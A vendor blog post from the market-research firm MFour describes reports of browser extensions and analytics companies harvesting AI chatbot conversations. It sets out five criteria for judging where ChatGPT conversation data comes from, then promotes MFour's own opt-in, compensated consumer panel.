What AI Conversation Theft Means for Market Research

The Privacy Threat Hiding in Plain Sight

In January 2026, cybersecurity firm OX Security published findings that two Chrome extensions — collectively installed by more than 900,000 users — had been silently exfiltrating every ChatGPT and DeepSeek conversation to attacker-controlled servers. The extensions requested permission for “anonymous, non-identifiable analytics data” while actually capturing complete conversation content, chat IDs, and full browsing histories every 30 minutes.

Security researcher Moshe Siman Tov Bustan demonstrated the exploit live in a video walkthrough, showing how a single ChatGPT query was encoded in base64 and transmitted — along with the full prompt, response, and browser URL history — to a remote command-and-control server within seconds of being typed.

The story, reported on The Hacker News, didn’t land in a vacuum. It followed similar revelations about Urban VPN Proxy, another extension with millions of installs caught spying on AI conversations. Security research firm Secure Annex gave the tactic a name: Prompt Poaching.

It’s Not Just Bad Actors

Here’s where the story takes a turn most coverage missed.

Secure Annex’s investigation found that prompt poaching isn’t limited to rogue extensions. Legitimate, well-known analytics platforms are doing it too. Similarweb — a publicly traded web analytics company with over a million Chrome extension users — introduced AI conversation monitoring in May 2025. A January 2026 update made it explicit in their terms of service: prompts, queries, uploaded files, images, and AI responses are all collected.

Their updated privacy policy states plainly that “some Sensitive Data may be inadvertently collected or processed” and that while they “take steps, where possible, to remove or filter out identifiers,” they “cannot guarantee that all Personal Data is removed.”

Sensor Tower’s Stayfocusd extension, with 600,000 users, was flagged for similar behavior.

“It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector,” Secure Annex researcher John Tuckner told The Hacker News. “This is just the beginning of this trend. More firms will begin to realize these insights are profitable.”

Why This Matters Beyond Cybersecurity

The cybersecurity angle is important, but there’s a larger story here for anyone working in consumer intelligence, market research, or brand strategy.

ChatGPT and other generative AI tools have become a primary touchpoint in the consumer journey. Wherever there’s value, there’s a supply chain. The prompt poaching wave reveals what that supply chain currently looks like: a spectrum ranging from outright theft to quietly buried consent clauses to — in rarer cases — transparent, ethical, opt-in fair-trade first-party collection.

Data collected in nefarious or gray-market fashion is not a stable input. Sources built on covert browser surveillance, buried consent, or exploitative collection methods are disappearing quickly once exposed. For brands and researchers, it is not only about trust, but continuity.

When evaluating ChatGPT conversation data as a signal source, the provenance of that data is no longer a nice-to-have question. It’s the very question.

Five Criteria for Evaluating Any ChatGPT Data Source

Whether you’re a brand insights team, a market research firm, or an enterprise building AI-powered consumer analytics, here’s a framework for vetting any provider claiming to offer ChatGPT conversation data:

1. Consent Mechanism

Ask: Did the consumer explicitly opt in to share their AI conversations — or was consent buried in a terms-of-service update they never read?

The prompt poaching cases reveal a pattern: permissions framed as “anonymous analytics” that actually capture everything. Genuine consent means the consumer understands specifically what they’re sharing, actively agrees to it, and can withdraw at any time. Look for affirmative opt-in, not passive non-objection.

2. Fair-Trade

Ask: Are the people whose conversations you’re analyzing being fairly compensated?

This is the ethical dimension that separates legitimate data businesses from extraction operations. Consumers whose data powers an analytics product deserve a real share of the value exchange — not a free service quietly monetized behind their backs. This is the difference between a legitimate data pipeline that continues to give versus one that is a cybersecurity thread and will be shut down.

3. First-Party Consumer Relationship

Ask: Does the provider have a direct, ongoing relationship with the consumers in the dataset?

A first-party relationship means the data collector knows who their panelists are, can communicate with them, and can attach verified demographics and attributes to each conversation. That context is what turns raw prompts into segmentable intelligence — you can see how conversations differ by age, income, geography, or life stage. Without it, you’re left with a blob of conversations that have no representation because they were silently surveilled.

4. PII Handling and Compliance Posture

Ask: Is personally identifiable information scrubbed before the data reaches your systems? What’s the compliance and governance framework?

ChatGPT conversations are uniquely sensitive. People share medical questions, financial details, relationship problems, and proprietary business information with AI chatbots. Any dataset derived from these conversations must have rigorous PII scrubbing, and the provider should be able to articulate their compliance framework clearly — not with vague assurances that they “take steps, where possible.”

5. Identify Resolution and Behavioral Context

Ask: Can you connect a conversation to anything else that consumer did — or is it just floating text?

A million ChatGPT conversations in isolation tell you what people are asking AI. That’s interesting but incomplete. The real intelligence value emerges when you can connect what a consumer asked ChatGPT to what they did next — what sites they visited, what apps they opened, what stores they walked into, what they bought. Without that connected view, you’re analyzing prompts without outcomes.

About MFour

At MFour, we’ve been ingesting a million opted-in ChatGPT conversations per month — collected through the #1 research app on the App Store, where 13M+ consumers have a direct, compensated relationship with us under our ethical, fair trade agreement model.

Every conversation is PII-scrubbed before ingestion. Every consumer explicitly opted in to share their conversation logs, is compensated for their participation, and can opt out at any time. And because these conversations come from our existing consumer panel, each one is linkable to the same person’s app usage, web browsing, GPS-verified location visits, receipt-level purchases, demographics, and survey responses for full consumer journey insights.

See how MFour makes it easy to query the entire data set through AI for immediate insights.